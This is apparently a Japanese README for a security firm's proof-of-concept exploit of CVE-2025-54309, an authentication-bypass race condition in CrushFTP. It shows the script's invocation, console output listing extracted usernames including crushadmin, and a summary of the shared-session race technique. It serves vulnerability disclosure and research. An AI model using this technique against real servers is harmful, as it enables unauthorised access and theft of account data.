
CrushFTP 認証バイパスの概念実証(PoC)
技術的詳細については、ブログ記事をご覧ください
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-CrushFTP-CVE-2025-54309.py
(*) CrushFTP Authentication Bypass Race Condition PoC
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-54309]
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!
このスクリプトは、CrushFTP インターフェースに対する CVE-2025-54309 の概念実証です。同じセッション識別子を共有する一連の競合リクエストを作成し、一方のリクエストでユーザー名プロパティを "crushadmin" に設定し、もう一方のリクエストでそのユーザーとして認証済みコマンドを実行することで、この PoC ではユーザー名の一覧を抽出することが可能です。詳細については、[ブログ記事] (https://labs.watchtowr.com/) で説明されています。
詳細は CrushFTP アドバイザリ をご覧ください
最新のセキュリティ研究については、watchTowr Labs チームをフォローしてください